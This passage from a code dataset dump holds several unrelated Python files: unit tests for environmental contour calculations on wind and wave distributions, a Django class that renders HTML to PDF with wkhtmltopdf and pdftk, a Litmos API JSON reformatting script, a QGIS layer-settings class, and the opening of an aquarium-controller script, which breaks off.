\"\"\"\n 2-d HDC with exponentiated Weibull distributions.\n \"\"\"\n\n # Define dependency tuple.\n dep1 = (None, None, None, None) # shape, location, scale, shape2\n dep2 = (None, None, 0, None) # shape, location, scale, shape2\n\n # Define parameters.\n v_shape = ConstantParam(11)\n v_loc = None\n v_scale = ConstantParam(2.6)\n v_shape2 = ConstantParam(0.54)\n par1 = (v_shape, v_loc, v_scale, v_shape2)\n\n hs_shape = ConstantParam(1.4)\n hs_loc = None\n hs_scale = FunctionParam('power3', 0.15, 0.0033, 2.45)\n hs_shape2 = ConstantParam(5)\n par2 = (hs_shape, hs_loc, hs_scale, hs_shape2)\n\n # Create distributions.\n dist1 = ExponentiatedWeibullDistribution(*par1)\n dist2 = ExponentiatedWeibullDistribution(*par2)\n\n distributions = [dist1, dist2]\n dependencies = [dep1, dep2]\n\n mul_dist = MultivariateDistribution(distributions, dependencies)\n\n # Calculate the contour.\n n_years = 50\n limits = [(0, 20), (0, 18)]\n deltas = [0.1, 0.1]\n test_contour_HDC = HighestDensityContour(mul_dist, n_years, 3,\n limits, deltas)\n\n # If we knew the correct coordinates we could continue with something like\n # this:\n #contour_coordinates = pd.DataFrame({'x' : test_contour_HDC.coordinates[0][0],\n # 'y' : test_contour_HDC.coordinates[0][1]})\n #result0 = pd.read_csv(testfiles_path + \"/filename.csv\")\n #for g,h in [(g, h) for g in result0.index for h in result0.columns]:\n # self.assertAlmostEqual(result0.loc[g, h], contour_coordinates.loc[g, h], places=8)\n\n\n def test_omae2020_wind_wave_contour(self):\n \"\"\"\n Contour similar to the wind-wave contour in 'Global hierararchical models\n for wind and wave contours', dataset D. 
First variable = wind speed,\n second variable = significant wave height.\n \"\"\"\n\n # Define dependency tuple.\n dep1 = (None, None, None, None) # shape, location, scale, shape2\n dep2 = (0, None, 0, None) # shape, location, scale, shape2\n\n # Define parameters.\n v_shape = ConstantParam(2.42)\n v_loc = None\n v_scale = ConstantParam(10)\n v_shape2 = ConstantParam(0.761)\n par1 = (v_shape, v_loc, v_scale, v_shape2)\n\n hs_shape = FunctionParam('logistics4', 0.582, 1.90, 0.248, 8.49)\n hs_loc = None\n hs_scale = FunctionParam('alpha3', 0.394, 0.0178, 1.88,\n C1=0.582, C2=1.90, C3=0.248, C4=8.49)\n\n hs_shape2 = ConstantParam(5)\n par2 = (hs_shape, hs_loc, hs_scale, hs_shape2)\n\n # Create distributions.\n dist1 = ExponentiatedWeibullDistribution(*par1)\n dist2 = ExponentiatedWeibullDistribution(*par2)\n\n distributions = [dist1, dist2]\n dependencies = [dep1, dep2]\n\n mul_dist = MultivariateDistribution(distributions, dependencies)\n\n # Calculate the contour.\n n_years = 50\n limits = [(0, 40), (0, 20)]\n deltas = [0.1, 0.1]\n test_contour_HDC = HighestDensityContour(mul_dist, n_years, 1,\n limits, deltas)\n\n # Compare the computed contours to the contours published in\n # 'Global hierarchical models for wind and wave contours', Figure 8.\n max_v = max(test_contour_HDC.coordinates[0][0])\n self.assertAlmostEqual(max_v, 29.5, delta=0.5) # Should be about 29.5\n max_hs = max(test_contour_HDC.coordinates[0][1])\n self.assertAlmostEqual(max_hs, 14.5, delta=0.5) # Should be about 15\n\n\n def test_HDC3d_WLL(self):\n \"\"\"\n Contour example for 3-d HDC with Weibull, Lognormal and\n Lognormal distribution.\n \"\"\"\n\n dep1 = (None, None, None)\n dep2 = (0, None, 0)\n dep3 = (0, None, 0)\n\n #define parameters\n shape = ConstantParam(1.471)\n loc = ConstantParam(0.8888)\n scale = ConstantParam(2.776)\n par1 = (shape, loc, scale)\n\n mu = FunctionParam('power3', 0.1000, 1.489, 0.1901)\n sigma = FunctionParam('exp3', 0.0400, 0.1748, -0.2243)\n\n\n #del shape, loc, scale\n\n #create distributions\n dist1 = WeibullDistribution(*par1)\n dist2 = LognormalDistribution(mu=mu, sigma=sigma)\n dist3 = LognormalDistribution(mu=mu, sigma=sigma)\n\n distributions = [dist1, dist2, dist3]\n dependencies = [dep1, dep2, dep3]\n\n mul_dist = MultivariateDistribution(distributions, dependencies)\n\n #del dist1, dist2, par1, par2, dep1, dep2, dependencies, distributions\n #calc contour\n n_years = 50\n limits = [(0, 20), (0, 18),(0, 18)]\n deltas = [1, 1, 1]\n\n test_contour_HDC = HighestDensityContour(mul_dist, n_years, 3,\n limits, deltas)\n\n finaldt = pd.DataFrame({'x' : test_contour_HDC.coordinates[0][0],\n 'y' : test_contour_HDC.coordinates[0][1],\n 'z' : test_contour_HDC.coordinates[0][2]})\n\n\n result = pd.read_csv(testfiles_path + \"/HDC3dWLL_coordinates.csv\")\n for i,j in [(i, j) for i in result.index for j in result.columns]:\n self.assertAlmostEqual(result.loc[i,j], finaldt.loc[i,j], places=8)\n\n\n def test_HDC4d_WLLL(self):\n \"\"\"\n Contour example for a 4-dimensinal HDC with Weibull, Lognormal,\n Lognormal and Lognormal distribution.\n \"\"\"\n\n # Define dependency tuple.\n dep1 = (None, None, None)\n dep2 = (0, None, 0)\n dep3 = (0, None, 0)\n dep4 = (0, None, 0)\n\n # Define parameters.\n shape = ConstantParam(2.776)\n loc = ConstantParam(1.471)\n scale = ConstantParam(0.8888)\n par1 = (shape, loc, scale)\n\n mu = FunctionParam('power3', 0.1000, 1.489, 0.1901)\n sigma = FunctionParam('exp3', 0.0400, 0.1748, -0.2243)\n\n # Create distributions.\n dist1 = WeibullDistribution(*par1)\n dist2 
= LognormalDistribution(mu=mu, sigma=sigma)\n dist3 = LognormalDistribution(mu=mu, sigma=sigma)\n dist4 = LognormalDistribution(mu=mu, sigma=sigma)\n\n\n distributions = [dist1, dist2, dist3, dist4]\n dependencies = [dep1, dep2, dep3, dep4]\n\n mul_dist = MultivariateDistribution(distributions, dependencies)\n\n # Compute contour.\n n_years = 50\n limits = [(0, 20), (0, 18), (0, 18), (0, 18)]\n deltas = [1, 1, 1, 1]\n\n test_contour_HDC = HighestDensityContour(mul_dist, n_years, 3,\n limits, deltas)\n\n\n\n def test_HDC2d_WN(self):\n \"\"\"\n Creating a contour example.\n \"\"\"\n\n\n # Define dependency tuple.\n dep1 = (None, None, None)\n dep2 = (None, 0, 0)\n\n # Define parameters.\n shape = ConstantParam(1.471)\n loc = ConstantParam(0.8888)\n scale = ConstantParam(2.776)\n par1 = (shape, loc, scale)\n\n shape = None\n loc = FunctionParam('power3', 4, 10, 0.02)\n scale = FunctionParam('exp3', 0.1, 0.02, -0.1)\n par2 = (shape, loc, scale)\n\n # Create distributions.\n dist1 = WeibullDistribution(*par1)\n dist2 = NormalDistribution(*par2)\n\n distributions = [dist1, dist2]\n dependencies = [dep1, dep2]\n\n mul_dist = MultivariateDistribution(distributions, dependencies)\n\n # Compute the contour.\n n_years = 50\n limits = [(0, 20), (0, 20)]\n deltas = [0.05, 0.01]\n test_contour_HDC = HighestDensityContour(mul_dist, n_years, 3,\n limits, deltas)\n\n finaldt2 = pd.DataFrame({'x' : test_contour_HDC.coordinates[0][0],\n 'y' : test_contour_HDC.coordinates[0][1]})\n\n result2 = pd.read_csv(testfiles_path + \"/HDC2dWN_coordinates.csv\")\n\n for k,l in [(k, l) for k in result2.index for l in result2.columns]:\n self.assertAlmostEqual(result2.loc[k,l], finaldt2.loc[k,l], places=8)\n\n\n\n def test_HDC3d_WLN(self):\n\n dep1 = (None, None, None)\n dep2 = (0, None, 0)\n dep3 = (None, 0, 0)\n\n # Define parameters.\n shape = ConstantParam(1.471)\n loc = ConstantParam(0.8888)\n scale = ConstantParam(2.776)\n par1 = (shape, loc, scale)\n\n shape = None\n loc = FunctionParam('power3', 4, 10, 0.02)\n scale = FunctionParam('exp3', 0.1, 0.02, -0.1)\n par2 = (shape, loc, scale)\n\n mu = FunctionParam('power3', 0.1, 1.5, 0.2)\n sigma = FunctionParam('exp3', 0.1, 0.2, -0.2)\n\n #create distributions\n dist1 = WeibullDistribution(*par1)\n dist2 = LognormalDistribution(mu=mu, sigma=sigma)\n dist3 = NormalDistribution(*par2)\n\n distributions = [dist1, dist2, dist3]\n dependencies = [dep1, dep2, dep3]\n\n mul_dist = MultivariateDistribution(distributions, dependencies)\n\n del mu, sigma\n #del dist1, dist2, par1, par2, dep1, dep2, dependencies, distributions\n #calc contour\n n_years = 50\n limits = [(0, 20), (0, 20),(0, 20)]\n deltas = [0.5, 0.5, 0.05]\n test_contour_HDC = HighestDensityContour(mul_dist, n_years, 3,\n limits, deltas)\n\n finaldt3 = pd.DataFrame({'x' : test_contour_HDC.coordinates[0][0],\n 'y' : test_contour_HDC.coordinates[0][1],\n 'z' : test_contour_HDC.coordinates[0][2]})\n\n matlab3 = pd.read_csv(testfiles_path + \"/hdc3d_wln.csv\", names=['x', 'y', 'z'])\n\n result3 = pd.read_csv(testfiles_path + \"/HDC3dWLN_coordinates.csv\")\n for m,n in [(m, n) for m in result3.index for n in result3.columns]:\n self.assertAlmostEqual(result3.loc[m, n], finaldt3.loc[m, n], places=8)\n\n def test_IForm2d_WL(self):\n \"\"\"\n 2-d IFORM contour.\n\n The used probabilistic model is described in Vanem and Bitner-Gregersen\n (2012), DOI: 10.1016/j.apor.2012.05.006 .\n \"\"\"\n\n # Define dependency tuple.\n dep1 = (None, None, None)\n dep2 = (0, None, 0)\n\n # Define parameters.\n shape = 
ConstantParam(1.471)\n loc = ConstantParam(0.8888)\n scale = ConstantParam(2.776)\n par1 = (shape, loc, scale)\n\n mu = FunctionParam('power3', 0.1000, 1.489, 0.1901)\n sigma = FunctionParam('exp3', 0.0400, 0.1748, -0.2243)\n\n # Create distributions.\n dist1 = WeibullDistribution(*par1)\n dist2 = LognormalDistribution(mu=mu, sigma=sigma)\n\n distributions = [dist1, dist2]\n dependencies = [dep1, dep2]\n\n mul_dist = MultivariateDistribution(distributions, dependencies)\n\n test_contour_IForm = IFormContour(mul_dist, 50, 3, 50)\n\n calculated_coordinates = pd.DataFrame({'x' : test_contour_IForm.coordinates[0][0],\n 'y' : test_contour_IForm.coordinates[0][1]})\n #calculated_coordinates.to_csv('save_this_file.csv', sep=',', header=['x', 'y'], index=False)\n\n true_coordinates = pd.read_csv(testfiles_path + \"/IForm2dWL_coordinates.csv\")\n for o,p in [(o, p) for o in true_coordinates.index for p in true_coordinates.columns]:\n self.assertAlmostEqual(calculated_coordinates.loc[o, p], true_coordinates.loc[o, p], places=8)\n\n def test_IForm2d_WN(self):\n \"\"\"\n 2-d IFORM contour.\n \"\"\"\n\n # Define dependency tuple.\n dep1 = (None, None, None)\n dep2 = (None, 0, 0)\n\n # Define parameters.\n shape = ConstantParam(1.471)\n loc = ConstantParam(0.8888)\n scale = ConstantParam(2.776)\n par1 = (shape, loc, scale)\n\n shape = None\n loc = FunctionParam('power3', 7, 1.489, 0.1901)\n scale = FunctionParam('exp3', 1.5, 0.1748, -0.2243)\n par2 = (shape, loc, scale)\n\n # Create distributions.\n dist1 = WeibullDistribution(*par1)\n dist2 = NormalDistribution(*par2)\n\n distributions = [dist1, dist2]\n dependencies = [dep1, dep2]\n\n mul_dist = MultivariateDistribution(distributions, dependencies)\n\n test_contour_IForm = IFormContour(mul_dist, 50, 3, 50)\n\n calculated_coordinates = pd.DataFrame({'x' : test_contour_IForm.coordinates[0][0],\n 'y' : test_contour_IForm.coordinates[0][1]})\n\n true_coordinates = pd.read_csv(testfiles_path + \"/IForm2dWN_coordinates.csv\")\n\n for r,s in [(r, s) for r in true_coordinates.index for s in true_coordinates.columns]:\n self.assertAlmostEqual(calculated_coordinates.loc[r, s], true_coordinates.loc[r, s], places=8)\n\n def test_IForm3d(self): # TODO what does this test do\n \"\"\"\n 3-dimensional IFORM contour.\n \"\"\"\n\n # Define dependency tuple.\n dep1 = (None, None, None)\n dep2 = (0, None, 0)\n dep3 = (0, None, 0)\n\n # Define parameters.\n shape = ConstantParam(1.471)\n loc = ConstantParam(0.8888)\n scale = ConstantParam(2.776)\n par1 = (shape, loc, scale)\n\n mu = FunctionParam('power3', 0.1000, 1.489, 0.1901)\n sigma = FunctionParam('exp3', 0.0400, 0.1748, -0.2243)\n\n #del shape, loc, scale\n\n # Create distributions.\n dist1 = WeibullDistribution(*par1)\n dist2 = LognormalDistribution(mu=mu, sigma=sigma)\n dist3 = LognormalDistribution(mu=mu, sigma=sigma)\n distributions = [dist1, dist2, dist3]\n dependencies = [dep1, dep2, dep3]\n\n mul_dist = MultivariateDistribution(distributions, dependencies)\n\n test_contour_IForm = IFormContour(mul_dist, 50, 3, 400)\n\n def test_isorm2d_WL(self):\n \"\"\"\n ISORM contour with Vanem2012 model.\n\n The used probabilistic model is described in Vanem and Bitner-Gregersen\n (2012), DOI: 10.1016/j.apor.2012.05.006\n \"\"\"\n\n # Define dependency tuple\n dep1 = (None, None, None)\n dep2 = (0, None, 0)\n\n # Define parameters\n shape = ConstantParam(1.471)\n loc = ConstantParam(0.8888)\n scale = ConstantParam(2.776)\n par1 = (shape, loc, scale)\n\n mu = FunctionParam('power3', 0.1000, 1.489, 0.1901)\n sigma = 
FunctionParam('exp3', 0.0400, 0.1748, -0.2243)\n\n # Create distributions\n dist1 = WeibullDistribution(*par1)\n dist2 = LognormalDistribution(mu=mu, sigma=sigma)\n\n distributions = [dist1, dist2]\n dependencies = [dep1, dep2]\n\n mul_dist = MultivariateDistribution(distributions, dependencies)\n\n test_contour_isorm = ISormContour(mul_dist, 50, 3, 50)\n\n calculated_coordinates = pd.DataFrame({'x': test_contour_isorm.coordinates[0][0],\n 'y': test_contour_isorm.coordinates[0][1]})\n\n true_coordinates = pd.read_csv(testfiles_path + \"/isorm2dWL_coordinates.csv\")\n for o, p in [(o, p) for o in true_coordinates.index for p in true_coordinates.columns]:\n self.assertAlmostEqual(calculated_coordinates.loc[o, p], true_coordinates.loc[o, p], places=8)\n\n\nclass HDCTest(unittest.TestCase):\n\n def _setup(self,\n limits=[(0, 20), (0, 20)],\n deltas=[0.05, 0.05],\n n_years = 25,\n dep1=(None, None, None),\n dep2=(0, None, 0),\n par1=(ConstantParam(1.471), ConstantParam(0.8888),\n ConstantParam(2.776)),\n par2=(FunctionParam('exp3', 0.0400, 0.1748, -0.2243), None,\n FunctionParam('power3', 0.1, 1.489, 0.1901))\n ):\n \"\"\"\n Creating a contour (same as in DOI: 10.1016/j.coastaleng.2017.03.002).\n \"\"\"\n\n self.limits = limits\n self.deltas = deltas\n self.n_years = n_years\n\n # Define dependency tuple.\n self.dep1 = dep1\n self.dep2 = dep2\n\n # Define parameters.\n self.par1 = par1\n self.par2 = par2\n\n # Create distributions.\n dist1 = WeibullDistribution(*par1)\n dist2 = LognormalDistribution(*par2)\n\n distributions = [dist1, dist2]\n dependencies = [dep1, dep2]\n\n mul_dist = MultivariateDistribution(distributions, dependencies)\n\n # Compute contour.\n test_contour_HDC = HighestDensityContour(mul_dist, n_years, 3,\n limits, deltas)\n return test_contour_HDC\n\n\n def test_cumsum(self):\n \"\"\"\n Tests if the return values of cumsum_biggest_until are correct.\n \"\"\"\n\n test_contour_HDC = self._setup()\n data_example = np.array([[80, 7, 20, 40], [1, 9, 45, 23]])\n\n summed_fields = test_contour_HDC.cumsum_biggest_until(data_example,\n 165.0)[0]\n last_summed = test_contour_HDC.cumsum_biggest_until(data_example,\n 165.0)[1]\n np.testing.assert_array_equal(summed_fields,\n ([[1, 0, 0, 1], [0, 0, 1, 0]]),\n 'cumsum calculates wrong summed_fields')\n self.assertEqual(last_summed, 40, 'cumsum gives wrong last_summed')\n\n\n def test_cumsum_nan_entry(self):\n \"\"\"\n Tests if ValueError is raised when the array has a 'nan' entry.\n \"\"\"\n\n test_contour_HDC = self._setup()\n data_example_nan = np.array([[80, 7, float('nan'), 40], [1, 9, 45, 23]])\n with self.assertRaises(ValueError):\n test_contour_HDC.cumsum_biggest_until(data_example_nan, 500.0)\n\n\n def test_setup_HDC_deltas_single(self):\n \"\"\"\n Tests if contour is created with a single float for deltas\n as the exception should handle.\n \"\"\"\n\n try:\n self._setup(deltas=0.05)\n\n except:\n print(\"contour couldn't be calculated\")\n\n\n def test_setup_HDC_deltas_none(self):\n \"\"\"\n Tests error when length of deltas is not equal with number of dimensions.\n \"\"\"\n\n test_contour_HDC = self._setup(deltas=None)\n self.assertEqual(test_contour_HDC.deltas, [0.5] *\n test_contour_HDC.distribution.n_dim)\n\n\n def test_setup_HDC_deltas_value(self):\n \"\"\"\n Tests error when length of deltas is not equal with number of dimensions.\n \"\"\"\n\n with self.assertRaises(ValueError):\n self._setup(deltas=[0.05, 0.05, 0.05])\n\n\n def test_setup_HDC_limits_length(self):\n \"\"\"\n Tests error when length of limits is not equal 
with number of dimensions.\n \"\"\"\n\n with self.assertRaises(ValueError):\n self._setup(limits=[(0, 20), (0, 20), (0, 20)])\n\n\n def test_setup_HDC_limits_none(self):\n \"\"\"\n Tests error when length of limits is not equal with number of dimensions.\n \"\"\"\n with self.assertWarns(RuntimeWarning):\n test_contour_HDC = self._setup(limits=None)\n self.assertEqual(test_contour_HDC.limits,\n [(0, 10)] * test_contour_HDC.distribution.n_dim)\n\n\n def test_setup_HDC_limits_Tuple_length(self):\n \"\"\"\n Tests error when length of limits_tuples is not two.\n \"\"\"\n\n with self.assertRaises(ValueError):\n self._setup(limits=[(0, 20), (20)])\n\n\n with self.assertRaises(ValueError):\n self._setup(limits=[(0, 20, 1), (0, 20)])\n\n\n# This is commented out as it does not ensure that the sorting algorithm\n# functions as intended.\n # def test_sort_coordinates(self):\n # \"\"\"\n # Sorts the points of a highest density contour and plots them.\n # \"\"\"\n #\n # # Define dependency tuple.\n # dep1 = (None, None, None)\n # dep2 = (0, None, 0)\n #\n # # Define parameters.\n # shape = ConstantParam(1.471)\n # loc = ConstantParam(0.8888)\n # scale = ConstantParam(2.776)\n # par1 = (shape, loc, scale)\n #\n # mu = FunctionParam('power3', 0.1000, 1.489, 0.1901)\n # sigma = FunctionParam('exp3', 0.0400, 0.1748, -0.2243)\n #\n # # Create distributions.\n # dist1 = WeibullDistribution(*par1)\n # dist2 = LognormalDistribution(mu=mu, sigma=sigma)\n #\n # distributions = [dist1, dist2]\n # dependencies = [dep1, dep2]\n #\n # mul_dist = MultivariateDistribution(distributions, dependencies)\n #\n # # Compute highest density contours with return periods of 1 and 20 years.\n # return_period_1 = 1\n # ts = 1 # Sea state duration in hours.\n # limits = [(0, 20), (0, 20)] # Limits of the computational domain.\n # deltas = [0.5, 0.5] # Dimensions of the grid cells.\n # hdc = HighestDensityContour(mul_dist, return_period_1, ts, limits, deltas)\n # c_unsorted = hdc.coordinates\n #\n # # Sort the coordinates.\n # c_sorted = sort_points_to_form_continous_line(c_unsorted[0][0],\n # c_unsorted[0][1],\n # do_search_for_optimal_start=True)\n #\n # # Plot the sorted and unsorted contours.\n # fig = plt.figure(figsize=(10, 5), dpi=150)\n # ax1 = fig.add_subplot(121)\n # plot_contour(x=c_unsorted[0][0],\n # y=c_unsorted[0][1],\n # ax=ax1,\n # contour_label=str(return_period_1) + '-yr contour',\n # line_style='b-')\n # ax1.title.set_text('Unsorted')\n # ax2 = fig.add_subplot(122)\n # plot_contour(x=c_sorted[0],\n # y=c_sorted[1],\n # ax=ax2,\n # contour_label=str(return_period_1) + '-yr contour',\n # line_style='b-')\n # ax2.title.set_text('Sorted')\n # #plt.show()\n\nclass DirectSamplingTest(unittest.TestCase):\n def _setup(self,\n dep1=(None, None, None),\n dep2=(0, None, 0),\n par1=(ConstantParam(1.471), ConstantParam(0.8888),\n ConstantParam(2.776)),\n par2=(FunctionParam('exp3', 0.0400, 0.1748, -0.2243), None,\n FunctionParam('power3', 0.1, 1.489, 0.1901))\n ):\n \"\"\"\n Creating contour.\n \"\"\"\n # Define dependency tuple.\n self.dep1 = dep1\n self.dep2 = dep2\n\n # Define parameters.\n self.par1 = par1\n self.par2 = par2\n\n # Create distributions.\n dist1 = WeibullDistribution(*par1)\n dist2 = LognormalDistribution(sigma=par2[0], mu=par2[2])\n\n distributions = [dist1, dist2]\n dependencies = [dep1, dep2]\n\n mul_dist = MultivariateDistribution(distributions, dependencies)\n\n # Calculate contour\n dsc = DirectSamplingContour(mul_dist, 10000000, 25, 6, 6)\n test_contour_dsc = dsc.direct_sampling_contour()\n return 
test_contour_dsc\n\n def test_contour(self):\n test_contour_dsc = self._setup()\n ref_contour = ([13.68, 13.68, 13.63, 13.63, 13.57, 13.45, 13.47, 13.43, 13.41, 13.22, 13.45, 13.21, 13.32,\n 13.44, 13.17, 13.12, 12.97, 12.99, 13.26, 13.05, 12.87, 12.77, 12.60, 12.18, 10.17, 3.39],\n [12.41, 13.57, 13.99, 13.99, 14.17, 14.44, 14.40, 14.46, 14.49, 14.66, 14.49, 14.63, 14.58,\n 14.54, 14.60, 14.60, 14.60, 14.60, 14.66, 14.59, 14.51, 14.46, 14.33, 13.96, 12.33, 2.24])\n\n for i in test_contour_dsc:\n for j in i:\n assert j < 15\n for i in test_contour_dsc[1]:\n assert i > 2\n # Neighbouring contour points should lie close together.\n self.assertAlmostEqual(test_contour_dsc[1][12],\n test_contour_dsc[1][13], places=0)\n\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"tests/test_contours.py","file_name":"test_contours.py","file_ext":"py","file_size_in_byte":26285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"83584620","text":"# -*- coding: utf-8 -*-\nfrom django.db import models\nimport subprocess\nimport codecs\nimport os\nimport sys\n\n# Create your models here.\n\nclass PDF():\n def __init__(self, file_id, revision, body, size, orientation, template):\n self.filename = file_id + \"_\" + revision + \"_\" + self.calc_md5msg(body)\n\n #(drive, tail) = os.path.splitdrive(__file__)\n self.path = \"./data/\"\n self.input = self.path + self.filename + \".html\"\n self.middle = self.path + self.filename + \"_tmp.pdf\"\n self.output = self.path + self.filename + \".pdf\"\n self.paper_size = size\n self.orientation = orientation\n self.template = template\n self.body = self.set_header() + body + self.set_footer()\n self.liquid_templates = {\"tate1\", \"tate2\", \"yoko1\", \"yoko2\"}\n return\n\n def get_filename(self) :\n return self.filename\n \n def calc_md5msg(self, body) :\n import hashlib\n tmp = body[0:1024].encode('utf-8')\n return hashlib.md5(tmp).hexdigest()\n\n def set_header(self) :\n header = \"\\n\" \\\n + \"\\n\" \\\n + \"\\n\" \\\n + \"\\n\" \\\n + \"\\n\" \\\n + \"\\n\" \\\n + \"\\n\" \\\n + \"\\n\" \\\n + \"\\n\" \\\n + \"\\n\" \\\n + \"
        \\n\"\n\n # \"\\n\" \\\n return header\n\n def set_footer(self) :\n footer = \"
        \\n\\n\\n\"\n return footer\n\n def forme_body(self, body) :\n import re\n formed_body = re.sub(r'', '', body, re.MULTILINE | re.DOTALL)\n return formed_body\n\n def create_pdf(self):\n with codecs.open(self.input, \"w\", \"UTF-8\") as file :\n file.write(self.body)\n file.flush()\n\n wkhtml2pdf_cmd = \"\"\n if self.template in self.liquid_templates :\n wkhtml2pdf_cmd = \"wkhtmltopdf --enable-smart-shrinking --load-error-handling ignore --margin-top 20 --margin-right 0 --margin-bottom 0 --margin-left 40 --orientation \" + self.orientation + \" --print-media-type -s \" + self.paper_size + \" \" + self.input + \" \" + self.middle\n else :\n wkhtml2pdf_cmd = \"wkhtmltopdf --disable-smart-shrinking --load-error-handling ignore --margin-top 0 --margin-right 0 --margin-bottom 0 --margin-left 0 --orientation \" + self.orientation + \" --print-media-type -s \" + self.paper_size + \" \" + self.input + \" \" + self.middle\n\n if subprocess.check_call(wkhtml2pdf_cmd, shell=True) != 0 :\n return False\n \n pdf_tk_cmd = \"pdftk \" + self.middle + \" cat 1 output \" + self.output\n if subprocess.check_call(pdf_tk_cmd, shell=True) != 0 :\n return False\n\n os.remove(self.middle)\n return True\n\n def delete_old_pdf(self, old_filename) :\n old_pdf = self.path + old_filename + \".pdf\"\n old_html = self.path + old_filename + \".html\"\n os.remove(old_pdf)\n os.remove(old_html)\n return\n","sub_path":"postex/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"42678467","text":"#!/usr/bin/env python3\nimport json\nimport re\nimport os\n\ndir = '/home/attunity/airflow/LitmosAPI/files/'\n\n\nwith open(dir + 'course_module_session_detail.json', mode='w', encoding='utf-8') as f: json.dump([], f)\n\n\ndef jprint(obj):\n text = json.dumps(obj, sort_keys=True, indent=4)\n print(text)\n\n\nwith open(dir + 'course_module_session.json', 'r') as json_file:\n data = json.loads(json_file.read())\n\n\njson_selected = {}\n\n\nfor json_selected in data:\n json_selected = {k: json_selected[k] for k in ('CourseId', 'ModuleId', 'Id', 'Name',\n 'InstructorUserId', 'InstructorName',\n 'SessionType', 'TimeZone', 'Location', 'LocationId',\n 'StartDate', 'EndDate', 'CourseName', 'ModuleName',\n 'Slots', 'Accepted', 'EnableWaitList', 'LoadDateTime'\n )}\n with open(dir + 'course_module_session_detail.json', mode='a', encoding='utf-8') as fa:\n json.dump(json_selected, fa, indent=4);\n\n\n# FORMATTING\nwith open(dir + 'course_module_session_detail.json', 'r') as json_file:\n formatted = re.sub(r'(?!^|.$)\\[*\\]*', '', json_file.read()).replace('[{', '[' + '\\n{').replace('}{', '},' + '\\n{')+'\\n]'\nwith open(dir + 'course_module_session_detail.json', mode='w', encoding='utf-8') as fa:\n fa.write(formatted)","sub_path":"API_CourseModuleSession.py","file_name":"API_CourseModuleSession.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"323191151","text":"# -*- coding: utf-8 -*-\n\"\"\"\n/***************************************************************************\n ARKspatial\n A QGIS plugin for Archaeological Recording.\n Part of the Archaeological Recording Kit by L - P : Archaeology\n http://ark.lparchaeology.com\n -------------------\n copyright : 2017 by L - P : Heritage LLP\n email : ark@lparchaeology.com\n copyright : 2017 by John Layt\n email : john@layt.net\n 
***************************************************************************/\n\n/***************************************************************************\n * *\n * This program is free software; you can redistribute it and/or modify *\n * it under the terms of the GNU General Public License as published by *\n * the Free Software Foundation; either version 2 of the License, or *\n * (at your option) any later version. *\n * *\n ***************************************************************************/\n\"\"\"\n\nfrom qgis.core import QGis\n\nfrom ..project import Project\n\nfrom collection_field_settings import CollectionFieldSettings\n\n\nclass CollectionLayerSettings:\n\n def __init__(self):\n self.layer = ''\n self.crs = ''\n self.geometry = QGis.NoGeometry\n self.multi = False\n self.label = ''\n self.name = ''\n self.fields = []\n self.path = ''\n self.stylePath = ''\n self.bufferLayer = False\n self.bufferName = ''\n self.bufferPath = ''\n self.logLayer = False\n self.logName = ''\n self.logPath = ''\n\n @staticmethod\n def fromArray(config):\n settings = CollectionLayerSettings()\n settings.layer = config['layer']\n settings.crs = config['crs']\n settings.geometry = config['geometry']\n settings.multi = config['multi']\n settings.label = config['label']\n settings.name = config['name']\n settings.path = config['path']\n settings.stylePath = config['stylePath']\n settings.bufferLayer = config['buffer']\n settings.bufferName = config['bufferName']\n settings.bufferPath = config['bufferPath']\n settings.logLayer = config['log']\n settings.logName = config['logName']\n settings.logPath = config['logPath']\n for field in config['fields']:\n settings.fields.append(CollectionFieldSettings.fromArray(field))\n return settings\n\n @staticmethod\n def fromProject(scope, path, layer):\n settings = CollectionLayerSettings()\n settings.layer = layer\n path = path + layer + '/'\n settings.label = Project.readEntry(scope, path + 'label')\n settings.name = Project.readEntry(scope, path + 'name')\n settings.path = Project.readEntry(scope, path + 'path')\n settings.bufferLayer = Project.readBoolEntry(scope, path + 'bufferLayer')\n settings.bufferName = Project.readEntry(scope, path + 'bufferName')\n settings.bufferPath = Project.readEntry(scope, path + 'bufferPath')\n settings.logLayer = Project.readBoolEntry(scope, path + 'logLayer')\n settings.logName = Project.readEntry(scope, path + 'logName')\n settings.logPath = Project.readEntry(scope, path + 'logPath')\n fields = Project.readListEntry(scope, path + 'fields')\n # fields is a list, so entries are appended rather than assigned by key\n for field in fields:\n settings.fields.append(CollectionFieldSettings.fromProject(scope, path, field))\n return settings\n\n def toProject(self, scope, path):\n path = path + self.layer + '/'\n Project.writeEntry(scope, path + 'label', self.label)\n Project.writeEntry(scope, path + 'name', self.name)\n Project.writeEntry(scope, path + 'path', self.path)\n Project.writeEntry(scope, path + 'bufferLayer', self.bufferLayer)\n Project.writeEntry(scope, path + 'bufferName', self.bufferName)\n Project.writeEntry(scope, path + 'bufferPath', self.bufferPath)\n Project.writeEntry(scope, path + 'logLayer', self.logLayer)\n Project.writeEntry(scope, path + 'logName', self.logName)\n Project.writeEntry(scope, path + 'logPath', self.logPath)\n for field in self.fields:\n field.toProject(scope, 
path)\n","sub_path":"ark/lib/core/collection_layer_settings.py","file_name":"collection_layer_settings.py","file_ext":"py","file_size_in_byte":4482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"502784946","text":"#!/usr/bin/python3\nimport os\n\nfrom pid import PidFile\n\n# set this path to the folder where the AquariumComputer scripts are installed\nos.chdir('/home/pi/AquariumComputer.Scripts')\n\nfrom basic_utils import *\nfrom errors import *\nfrom constants import *\n\nfrom modules.StatisticsModule import *\nfrom modules.SettingsModule import *\nfrom modules.ErrorModule import *\nfrom modules.OutputModule import *\nfrom modules.InputModule import *\nfrom modules.TemperatureModule import *\nfrom modules.AtoModule import *\n\nfrom modules.TimerModule import *\nfrom modules.MaintenanceModule import *\nfrom modules.LiveModule import *\nfrom modules.EmailModule import *\nfrom modules.LoggingModule import *\nfrom modules.ManualOverrideModule import *\nfrom modules.DatabaseModule import *\n#from DisplayModule import *\n\ndef main():\n loggingModule = LoggingModule(LOGGING_SETTING_FILE)\n loggingModule.Debug('Main script started...')\n\n settingsModule = SettingsModule()\n settingsModule.ReadSettings(SETTINGS_FILE)\n 